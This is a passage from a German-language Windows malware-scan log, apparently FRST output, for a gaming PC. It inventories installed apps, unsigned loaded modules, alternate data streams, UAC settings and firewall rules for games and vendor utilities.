Files\WindowsApps\Microsoft.FlightSimulator_1.26.5.0_x64__8wekyb3d8bbwe [2022-06-19] (Microsoft Studios) Microsoft Flight Simulator Digital Ownership -> C:\Program Files\WindowsApps\Microsoft.DigitalOwnership_1.0.1.0_x64__8wekyb3d8bbwe [2022-06-19] (Microsoft Studios) Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.19.5.0_x64__8wekyb3d8bbwe [2022-06-09] (Microsoft Studios) Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.1.17.0_x64__8wekyb3d8bbwe [2022-06-09] (Microsoft Studios) No Man's Sky -> C:\Program Files\WindowsApps\HelloGames.NoMansSky_3.92.22975.0_x64__bs190hzg1sesy [2022-06-18] (Hello Games) NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-05-29] (NVIDIA Corp.) Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.29.256.0_x64__dt26b99r8h8gj [2022-04-08] (Realtek Semiconductor Corp) Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.186.857.0_x86__zpdnekdrzrea0 [2022-06-09] (Spotify AB) [Startup Task] WindowsAppRuntime.1.0 -> C:\Program Files\WindowsApps\Microsoft.WindowsAppRuntime.1.0_3.469.1654.0_x64__8wekyb3d8bbwe [2022-04-29] (Microsoft Corporation) WindowsAppRuntime.1.0 -> C:\Program Files\WindowsApps\Microsoft.WindowsAppRuntime.1.0_3.469.1654.0_x86__8wekyb3d8bbwe [2022-04-29] (Microsoft Corporation) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert] ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ContextMenuHandlers2: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ContextMenuHandlers2: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert] ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\nvshext.dll [2022-05-21] (Nvidia Corporation -> NVIDIA Corporation) ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert] ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ==================== Codecs (Nicht auf der Ausnahmeliste) ==================== ==================== Verknüpfungen & WMI ======================== (Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.) ShortcutWithArgument: C:\Users\Pauli\Desktop\Persönlich - Edge.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (Microsoft Corporation) -> --profile-directory="Profile 1" ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============= 2022-05-31 18:29 - 2022-05-31 18:29 - 000925184 _____ () [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\plugins\cef\CefSharp.BrowserSubprocess.Core.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 001396224 _____ () [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\plugins\cef\CefSharp.Core.Runtime.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 147872256 _____ () [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\plugins\cef\libcef.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 000355840 _____ () [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\plugins\cef\libegl.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 003497472 _____ () [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\plugins\cef\vk_swiftshader.dll 2022-01-10 07:36 - 2022-01-10 07:36 - 000515584 _____ () [Datei ist nicht signiert] \\?\C:\Program Files (x86)\ASUS\ArmouryDevice\node_modules\ac_node_addon\prebuilds\win32-ia32\node.napi.node 2022-01-11 16:52 - 2022-01-11 16:52 - 000479744 _____ () [Datei ist nicht signiert] \\?\C:\Program Files (x86)\ASUS\ArmouryDevice\node_modules\ffi-napi\prebuilds\win32-ia32\node.napi.node 2022-01-11 16:52 - 2022-01-11 16:52 - 000470016 _____ () [Datei ist nicht signiert] \\?\C:\Program Files (x86)\ASUS\ArmouryDevice\node_modules\ref-napi\prebuilds\win32-ia32\node.napi.node 2022-01-10 07:36 - 2022-01-10 07:36 - 000832512 _____ () [Datei ist nicht signiert] \\?\C:\Program Files (x86)\ASUS\ArmouryDevice\node_modules\usb-detection\prebuilds\win32-ia32\node.napi.node 2022-04-08 19:35 - 2022-01-12 16:43 - 000093184 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\zlibwapi.dll 2021-12-23 15:51 - 2021-12-23 15:51 - 000081920 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\ASUS\ArmouryDevice\dll\WindowID\WindowID.dll 2022-04-08 20:41 - 2022-03-04 04:23 - 126965248 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libcef.dll 2022-04-08 20:41 - 2021-11-17 13:38 - 000384000 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libegl.dll 2022-04-08 20:41 - 2021-11-17 13:38 - 008006656 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libglesv2.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 005526016 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\plugins\cef\libglesv2.dll 2019-08-13 15:38 - 2019-08-13 15:38 - 000147456 _____ () [Datei ist nicht signiert] C:\ProgramData\NFS\v3\nfccapi.dll 2020-05-26 17:08 - 2020-05-26 17:08 - 002831360 _____ (Apache Software Foundation) [Datei ist nicht signiert] C:\Program Files (x86)\LightingService\log4cxx.dll 2022-04-29 22:57 - 2022-04-29 22:57 - 000179712 _____ (Dominic Jonas) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\NLogViewer.dll 2022-04-29 22:57 - 2022-04-29 22:57 - 000057344 _____ (Google) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\GrpcDotNetNamedPipes.dll 2022-04-10 12:52 - 2021-12-26 16:00 - 000093696 _____ (Igor Pavlov) [Datei ist nicht signiert] C:\Program Files\7-Zip\7-zip.dll 2022-04-29 22:57 - 2022-04-29 22:57 - 000056832 _____ (Linearstar) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\RawInput.Sharp.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 000026112 _____ (Lively) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\de\Lively.resources.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 000428544 _____ (Lively) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Lively.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 000111616 _____ (Lively.Common) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Lively.Common.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 000152576 _____ (Lively.Grpc.Common) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Lively.Grpc.Common.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 000042496 _____ (Lively.Models) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Lively.Models.dll 2022-04-29 22:57 - 2022-04-29 22:57 - 000005120 _____ (Matteo Pagani) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\DesktopBridge.Helpers.dll 2022-05-08 10:55 - 2022-06-02 19:17 - 202622392 _____ (Microsoft Corporation -> Microsoft Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.39\msedge.dll 2022-05-08 10:55 - 2022-06-02 19:17 - 202622392 _____ (Microsoft Corporation -> Microsoft Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\Microsoft\EdgeWebView\Application\101.0.1210.39\msedge.dll 2019-08-13 15:38 - 2019-08-13 15:38 - 000373760 _____ (NetFilterSDK.com) [Datei ist nicht signiert] C:\ProgramData\NFS\v3\protflt.dll 2022-04-29 22:57 - 2022-04-29 22:57 - 000823296 _____ (NLog) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\NLog.dll 2022-01-31 11:48 - 2022-01-31 11:48 - 000090112 _____ (Silicon Laboratories, Inc.) [Datei ist nicht signiert] C:\Program Files\Corsair\CORSAIR iCUE 4 Software\SiUSBXp.dll 2022-04-29 22:57 - 2022-04-29 22:57 - 000032768 _____ (Soroush Falahati (falahati.net)) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\UACHelper.dll 2022-05-31 18:29 - 2022-05-31 18:29 - 000994304 _____ (The Chromium Authors) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\plugins\cef\chrome_elf.dll 2022-04-08 20:41 - 2022-03-04 04:23 - 000983552 _____ (The Chromium Authors) [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\chrome_elf.dll 2022-04-08 19:35 - 2022-01-12 16:43 - 003394560 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\libcrypto-1_1-x64.dll 2022-04-08 19:35 - 2022-01-12 16:43 - 000679424 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\libssl-1_1-x64.dll 2022-04-08 19:36 - 2021-10-22 11:27 - 003394560 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\libcrypto-1_1-x64.dll 2022-04-08 19:36 - 2021-10-22 11:27 - 000679424 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\libssl-1_1-x64.dll 2022-04-15 19:31 - 2022-04-15 19:31 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\LIBEAY32.dll 2022-04-15 19:31 - 2022-04-15 19:31 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\ssleay32.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 002815488 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libcrypto-1_1-x64.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 000678400 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libssl-1_1-x64.dll 2019-08-13 15:38 - 2019-08-13 15:38 - 002648576 _____ (The OpenSSL Project, hxxps://www.openssl.org/) [Datei ist nicht signiert] C:\ProgramData\NFS\v3\libcrypto-1_1.dll 2019-08-13 15:38 - 2019-08-13 15:38 - 000640512 _____ (The OpenSSL Project, hxxps://www.openssl.org/) [Datei ist nicht signiert] C:\ProgramData\NFS\v3\libssl-1_1.dll 2022-04-15 19:31 - 2022-04-15 19:31 - 001611264 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\platforms\qwindows.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 005487104 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Core.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 005841920 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Gui.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 001179136 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Network.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 000146432 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5WebSockets.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 005089792 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Widgets.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 000184832 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Xml.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 000046592 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\bearer\qgenericbearer.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 006270976 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Core.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 001389568 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Network.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 000157184 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5WebSockets.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 000210432 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Xml.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) AlternateDataStreams: C:\Users\Pauli\Anwendungsdaten:d988fd1ce0beed92b2bcb751f85f2bf5 [394] AlternateDataStreams: C:\Users\Pauli\AppData\Roaming:d988fd1ce0beed92b2bcb751f85f2bf5 [394] AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [9112] ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ================== ==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ================= ==================== Internet Explorer (Nicht auf der Ausnahmeliste) ========== ==================== Hosts Inhalt: ========================= (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2021-06-05 14:08 - 2021-06-05 14:08 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts ==================== Andere Bereiche =========================== (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKU\S-1-5-21-1424437550-2087844553-323541659-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Pauli\Downloads\3840x2160-dodge-challenger-srt-in-usa_1565054844.jpg DNS Servers: 192.168.1.254 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: ) ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) MSCONFIG\Services: CC-Updater => 2 HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\StartupApproved\Run: => "OneDrive" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================ (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{2D3ED52A-486A-4579-83AA-169A6E06E61C}] => (Allow) C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.) FirewallRules: [{08E639C7-EB1D-4714-B3C9-FCAEC732F79D}] => (Allow) C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.) FirewallRules: [{96CC428F-375C-497D-AD93-13DAA54CD9EF}] => (Allow) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe (ASUSTeK COMPUTER INC. -> ASUS) FirewallRules: [{B06D9D7E-5C4F-4DD9-AB14-E33FA3EC8E58}] => (Allow) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmouryHtmlDebugServer.exe (ASUSTeK COMPUTER INC. -> ASUS) FirewallRules: [{06ED7BE2-B10E-4C6C-AA25-FF76DC33B86A}] => (Allow) C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) FirewallRules: [TCP Query User{FF62879B-607B-4A9B-B1E4-CF9E8A483B8A}C:\users\pauli\appdata\local\packages\b9eced6f.armourycrate_qmba6cd70vzyy\localstate\gridupdatefile\asusgcdriverupdateclient.exe] => (Allow) C:\users\pauli\appdata\local\packages\b9eced6f.armourycrate_qmba6cd70vzyy\localstate\gridupdatefile\asusgcdriverupdateclient.exe (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) FirewallRules: [UDP Query User{213E2DC9-2638-4DF7-8052-43B61E093999}C:\users\pauli\appdata\local\packages\b9eced6f.armourycrate_qmba6cd70vzyy\localstate\gridupdatefile\asusgcdriverupdateclient.exe] => (Allow) C:\users\pauli\appdata\local\packages\b9eced6f.armourycrate_qmba6cd70vzyy\localstate\gridupdatefile\asusgcdriverupdateclient.exe (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) FirewallRules: [{19C9FB6F-5F60-484C-8B8B-44621EDA54FE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation) FirewallRules: [{1C5A58EC-9159-41C8-B776-1C62EC251C78}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation) FirewallRules: [{6614F307-C2C1-4D30-8E10-DE0F2E5E65FC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{552EF6B3-A1F6-4E7F-BFD5-E271EDECF079}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{9608B149-B5C8-4A91-910C-A6B4212D2B36}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{CF2FA04A-288C-446D-BC6B-B5517E1061CB}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation) FirewallRules: [TCP Query User{113BA394-F3BF-4CC7-930D-28CCD9B20056}C:\users\pauli\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Block) C:\users\pauli\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe FirewallRules: [UDP Query User{8025F8E4-8229-472C-9263-CD416DDE55F9}C:\users\pauli\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Block) C:\users\pauli\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe FirewallRules: [TCP Query User{E0B4CE7E-DD84-4AC3-87A9-183CE0FC1CC4}C:\xboxgames\forza horizon 5\content\forzahorizon5.exe] => (Allow) C:\xboxgames\forza horizon 5\content\forzahorizon5.exe (Zugriff verweigert) [Datei ist nicht signiert] FirewallRules: [UDP Query User{228CE53A-87FB-4FD5-8BFE-A46DF5499601}C:\xboxgames\forza horizon 5\content\forzahorizon5.exe] => (Allow) C:\xboxgames\forza horizon 5\content\forzahorizon5.exe (Zugriff verweigert) [Datei ist nicht signiert] FirewallRules: [TCP Query User{B5D7AFA7-6885-4446-A642-EDB5C1B08543}C:\xboxgames\medieval dynasty\content\medieval_dynasty\binaries\wingdk\medieval_dynasty-wingdk-shipping.exe] => (Allow) C:\xboxgames\medieval dynasty\content\medieval_dynasty\binaries\wingdk\medieval_dynasty-wingdk-shipping.exe => Keine Datei FirewallRules: [UDP Query User{54E9CB8F-94CA-4C5B-8454-6FEC1102BC05}C:\xboxgames\medieval dynasty\content\medieval_dynasty\binaries\wingdk\medieval_dynasty-wingdk-shipping.exe] => (Allow) C:\xboxgames\medieval dynasty\content\medieval_dynasty\binaries\wingdk\medieval_dynasty-wingdk-shipping.exe => Keine Datei FirewallRules: [TCP Query User{880B34AC-E480-4E05-85CD-B9ED207082DC}C:\xboxgames\generation zero\content\generationzero_f.exe] => (Allow) C:\xboxgames\generation zero\content\generationzero_f.exe => Keine Datei FirewallRules: [UDP Query User{F0479043-83DA-414E-BFD5-A7A88FCD441B}C:\xboxgames\generation zero\content\generationzero_f.exe] => (Allow) C:\xboxgames\generation zero\content\generationzero_f.exe => Keine Datei FirewallRules: [TCP Query User{FE3510D7-7497-4576-A403-AEA070E84C9C}C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Block) C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe => Keine Datei FirewallRules: [UDP Query User{30295B7F-8090-45C6-981E-2BC1A5389ECA}C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Block) C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe => Keine Datei FirewallRules: [TCP Query User{E2259D74-7D8F-4B00-9137-0BDD16847C8E}C:\program files (x86)\steam\steamapps\common\crowz\crowfps\binaries\win64\crowfpsclient-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\crowz\crowfps\binaries\win64\crowfpsclient-win64-shipping.exe => Keine Datei FirewallRules: [UDP Query User{684923A5-A4A2-42C0-A684-7A5667219C68}C:\program files (x86)\steam\steamapps\common\crowz\crowfps\binaries\win64\crowfpsclient-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\crowz\crowfps\binaries\win64\crowfpsclient-win64-shipping.exe => Keine Datei FirewallRules: [TCP Query User{4D11CF0B-766E-4134-82E8-164F4B3B7B00}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [UDP Query User{B8789215-E333-411E-912A-1A2CA78F4DAA}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [TCP Query User{497400A7-6366-4276-8C68-486BBF8A8B99}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [UDP Query User{5F6AF174-CE22-4CED-93F4-D0E58985B108}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [TCP Query User{D5F4462E-3E5F-400A-8A15-2CE568228EA0}C:\program files\ea games\fifa 22\fifa22.exe] => (Allow) C:\program files\ea games\fifa 22\fifa22.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [UDP Query User{083109C6-62EB-44DE-9D15-500D639AA75D}C:\program files\ea games\fifa 22\fifa22.exe] => (Allow) C:\program files\ea games\fifa 22\fifa22.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{C6C048FC-C6FC-423C-81DA-8AECBB477C03}] => (Allow) C:\Program Files (x86)\Origin Games\Plants vs. Zombies\PlantsVsZombies.exe (PopCap Games -> ) FirewallRules: [{569C58DC-F4FA-4E6F-92F8-ADC213B20DC0}] => (Allow) C:\Program Files (x86)\Origin Games\Plants vs. Zombies\PlantsVsZombies.exe (PopCap Games -> ) FirewallRules: [{459C85F4-7624-4C11-A295-167AA8A39561}] => (Allow) C:\Program Files (x86)\Origin Games\Plants vs Zombies Garden Warfare\PVZ.Main_Win64_Retail.exe (Electronic Arts -> EA PopCap) FirewallRules: [{85DE355B-4D88-4BCA-8986-771FCB89EBA6}] => (Allow) C:\Program Files (x86)\Origin Games\Plants vs Zombies Garden Warfare\PVZ.Main_Win64_Retail.exe (Electronic Arts -> EA PopCap) FirewallRules: [{93D60944-5648-4DA6-A4A5-A19E37344FFB}] => (Allow) C:\Program Files (x86)\Origin Games\Farmers Dynasty\FarmersDynasty.exe (Electronic Arts, Inc. -> ) FirewallRules: [{A6747B9B-D07F-4C03-87DE-8CFC763050CE}] => (Allow) C:\Program Files (x86)\Origin Games\Farmers Dynasty\FarmersDynasty.exe (Electronic Arts, Inc. -> ) FirewallRules: [{9F39B8A1-5FCD-4D26-A1C9-6D11579DA7E4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Flashing Lights\flashinglights.exe () [Datei ist nicht signiert] FirewallRules: [{89F6159F-4099-4997-80CE-CAB7FB75EC56}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Flashing Lights\flashinglights.exe () [Datei ist nicht signiert] FirewallRules: [TCP Query User{09FE0EF0-71D8-4244-A37A-23D6F53C06F5}C:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files\rockstar games\grand theft auto v\gta5.exe (Rockstar Games, Inc. -> Rockstar Games) FirewallRules: [UDP Query User{7C6FFB72-D318-49A4-B38D-23ACA3E272A3}C:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files\rockstar games\grand theft auto v\gta5.exe (Rockstar Games, Inc. -> Rockstar Games) FirewallRules: [TCP Query User{719B81D7-5529-4180-BE7D-ACB2411F3A48}C:\program files\lghub\lghub_agent.exe] => (Allow) C:\program files\lghub\lghub_agent.exe (Logitech Inc -> Logitech, Inc.) FirewallRules: [UDP Query User{E71C9D81-D04E-4F58-AD12-9AE2A2CDD40C}C:\program files\lghub\lghub_agent.exe] => (Allow) C:\program files\lghub\lghub_agent.exe (Logitech Inc -> Logitech, Inc.) FirewallRules: [{F38FA5D4-83EF-4299-A664-F608E78E25BC}] => (Allow) C:\Program Files\LGHUB\lghub.exe (Logitech Inc -> Logitech, Inc.) FirewallRules: [{29D1EF40-C066-4B10-B6B7-8B799CD78AD3}] => (Allow) C:\Program Files\LGHUB\lghub_agent.exe (Logitech Inc -> Logitech, 